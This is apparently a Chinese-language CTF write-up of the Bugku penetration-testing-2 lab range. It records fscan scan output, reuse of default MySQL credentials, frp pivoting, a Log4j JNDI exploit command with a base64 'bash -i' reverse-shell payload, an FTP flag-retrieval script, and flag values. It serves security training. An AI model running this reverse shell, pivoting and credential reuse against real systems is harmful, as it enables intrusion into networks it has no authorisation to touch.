Home bugku 渗透测试2渗透记录
Post
Cancel

bugku 渗透测试2渗透记录

未命名文件

image-20240728091958972

image-20240728092005696

命令执行(这里不知道为什么burp没成功)

https://blog.csdn.net/acdcccc/article/details/132700902

image-20240728092253236

getshell使用教程公开exploit

flag1

image-20240728092704334

上传fscan

1
2
3
4
5
6
7
8
9
192.168.0.2:3306 open
192.168.0.3:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.1:22 open
[*] WebTitle: http://192.168.0.1        code:200 len:3392   title:Harry's Blog
[*] WebTitle: http://192.168.0.2        code:200 len:3392   title:Harry's Blog
[*] WebTitle: http://192.168.0.3        code:200 len:4789   title:Bugku后台管理系统
[+] mysql:192.168.0.2:3306:root 

flag2

0.1 0.2 配置一个是一样的我们localhost连接

账号密码 root:root

web配置文件也存在,只不过是cms账号

有数据库

image-20240728093731807

架上frp

image-20240728093544837

image-20240728094242028

连接成功

image-20240728094252294

0.3

image-20240728095615124

image-20240728095704318

log4j

登录会记录日志

image-20240728095025883

靶机出网

flag3

这里是真的巧合了

flag{5fbf32731e82fefa606360f2d08d2ced}

image-20240728095511611

JNDIExploit-1.2-SNAPSHOT.jar

这个工具不行

用下面的命令

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,xxxxxxx}|{base64,-d}|{bash,-i}" -A 0.0.0.0

flag4

image-20240728101406332

这里还存在一个一网段

image-20240728101431783

flag5

image-20240728101746549

1
2
3
4
5
6
7
192.168.1.2:80 open
192.168.1.1:22 open
192.168.1.3:80 open
192.168.1.1:80 open
[*] WebTitle http://192.168.1.1        code:200 len:3392   title:Harry's Blog
[*] WebTitle http://192.168.1.2        code:200 len:4789   title:Bugku后台管理系统
[*] WebTitle http://192.168.1.3        code:200 len:524    title:乙公司Git仓库

继续frp

原先的一层不需要了,重新配置

image-20240728111612802

flag6

提交克隆

https://github.com/lmzds/test2.git

image-20240728112729981

测试需要改名仓库名

每次都要 clone一下

image-20240728114302529

flag7

image-20240728114407637

image-20240728114427975

1
2
3
4
5
6
10.10.0.1:22 open
10.10.0.3:21 open
10.10.0.2:80 open
10.10.0.1:80 open
[*] WebTitle: http://10.10.0.2          code:200 len:524    title:乙公司Git仓库
[*] WebTitle: http://10.10.0.1          code:200 len:3368   title:Harry's Blog

image-20240728123307904

提示 /

image-20240728123451535

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from ftplib import FTP, error_perm


ftp = FTP('10.10.0.3')
ftp.login('guest', 'guest')

print(ftp.retrlines('LIST'))

with open('flag1.txt', 'wb') as file:
    ftp.retrbinary('RETR flag', file.write)
    
ftp.cwd('/')
print(ftp.retrlines('LIST'))
with open('flag2.txt', 'wb') as file:
    ftp.retrbinary('RETR flag', file.write)

flag8

image-20240728124023398

flag{e7fe2fb22b525d0b5c67df613fabc95d}

This post is licensed under CC BY 4.0 by the author.